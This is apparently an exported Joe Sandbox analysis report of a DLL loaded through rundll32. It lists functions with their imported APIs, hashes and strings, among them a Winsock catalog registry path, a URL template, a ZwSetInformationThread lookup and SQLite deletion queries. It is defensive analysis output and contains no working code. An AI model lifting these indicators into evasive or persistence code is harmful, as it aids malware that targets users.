Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Window$AncestorFromPointRectmemset
String ID:
API String ID: 3039914759-0
Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004B34 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 0000000180004B51
iswspace.MSVCRT ref: 0000000180004B62
_errno.MSVCRT ref: 0000000180004BC5
memmove.MSVCRT ref: 0000000180004BE4
_errno.MSVCRT ref: 0000000180004C25

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errnoiswspace$memmove
String ID:
API String ID: 972559988-0
Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85B4CC Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00000187EC85B59C
wsprintfW.USER32 ref: 00000187EC85B5EE
CreateProcessW.KERNEL32 ref: 00000187EC85B63D
CloseHandle.KERNEL32 ref: 00000187EC85B650
CloseHandle.KERNEL32 ref: 00000187EC85B65B

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$CreateProcess
String ID:
API String ID: 2803068115-0
Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction ID: 5be14acec3151acebb2fbaa506ea4156e102aeb3563396ac0d9a634dce52911f
Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction Fuzzy Hash: 0E41EE7622CBC1D6EB60DB14E5803EAB7A0F7D4344F608065D78943AA9DFBCC659CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010EFC Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180011890: EnterCriticalSection.KERNEL32 ref: 00000001800118C7
Part of subcall function 0000000180011890: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180011949
Part of subcall function 0000000180011890: LeaveCriticalSection.KERNEL32 ref: 0000000180011965

DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180010F28

Part of subcall function 00000001800101E0: ??3@YAXPEAX@Z.MSVCRT ref: 000000018001021F

??3@YAXPEAX@Z.MSVCRT ref: 0000000180010F67
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FCC
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FE2
DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180011004

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalSection$Delete$EnterLeave
String ID:
API String ID: 274858031-0
Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072640 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072658

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072700 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072718

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800543E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544D5
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544FA
??3@YAXPEAX@Z.MSVCRT ref: 000000018005469A

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800543EC

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800546E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547CD
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180054933

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800546F0

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C374 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140synchronizationtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000C3B5
ReleaseMutex.KERNEL32 ref: 000000018000C520

Strings

%I64d, xrefs: 000000018000C3DE
__LastModified__, xrefs: 000000018000C43A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Time$FileMutexReleaseSystem
String ID: %I64d$__LastModified__
API String ID: 4233779698-1650611527
Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180048BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180048C08

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 0000000180048D8C: _vsnwprintf_s.LEGACY_STDIO_DEFINITIONS ref: 0000000180048DAE

IsBadStringPtrW.KERNEL32 ref: 0000000180048CE6

Strings

com, xrefs: 0000000180048C0D, 0000000180048C4F
error_code, xrefs: 0000000180048C48

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: HeapProcessString_vsnwprintf_smemset
String ID: com$error_code
API String ID: 3912638396-1490343999
Opcode ID: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
Opcode Fuzzy Hash: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D00C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000D094
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018000D132
GetLastError.KERNEL32 ref: 000000018000D13C

Strings

http://%s/wcheckquery, xrefs: 000000018000D012

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinmemset
String ID: http://%s/wcheckquery
API String ID: 1980634866-481256882
Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96sleeplibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,000000018001AEC5), ref: 00000001800747AB
Sleep.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074840
SetLastError.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074885

Strings

InitOnceExecuteOnce, xrefs: 00000001800747A1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressErrorLastProcSleep
String ID: InitOnceExecuteOnce
API String ID: 299661913-4081768745
Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042088 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800421A6

Strings

emc, xrefs: 0000000180042137
mpt, xrefs: 0000000180042158
nct, xrefs: 000000018004217C

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: emc$mpt$nct
API String ID: 0-4018135154
Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CCA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000018005CD59
GetProcAddress.KERNEL32 ref: 000000018005CD6E

Strings

NTDLL.DLL, xrefs: 000000018005CD52
ZwSetInformationThread, xrefs: 000000018005CD64

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$ZwSetInformationThread
API String ID: 1646373207-2735485441
Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F014 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32 ref: 000000018005F105

Strings

update sqlite_sequence set seq = 0 where name='MT';, xrefs: 000000018005F0DF
select * from sqlite_sequence;, xrefs: 000000018005F0A6
DELETE FROM 'MT', xrefs: 000000018005F06D

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: MutexRelease
String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
API String ID: 1638419-14785165
Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005C9F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005CA65
_time64.MSVCRT ref: 000000018005CA9D

Strings

MsgCenter, xrefs: 000000018005CA28
opentime_afterupdate, xrefs: 000000018005CA52

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Value_time64
String ID: MsgCenter$opentime_afterupdate
API String ID: 785988768-2434204715
Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_wcslwr.MSVCRT ref: 000000018005CE1F
memset.MSVCRT ref: 000000018005CE61
??2@YAPEAX_K@Z.MSVCRT ref: 000000018005CE89

Strings

Global\QIHOO360_%s, xrefs: 000000018005CE6B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@_wcslwrmemset
String ID: Global\QIHOO360_%s
API String ID: 2483156104-3710684550
Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A4C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON

Download Yara Rule

APIs

sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542

Strings

%hu-%hu-%hu %hu:%hu:%hu, xrefs: 000000018006A4FA

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Time$File$LocalSystemsscanf
String ID: %hu-%hu-%hu %hu:%hu:%hu
API String ID: 34346384-1004895946
Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040358 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004038D
SHGetSpecialFolderPathW.SHELL32 ref: 00000001800403A0

Part of subcall function 0000000180019044: LoadLibraryExW.KERNEL32 ref: 000000018001906D
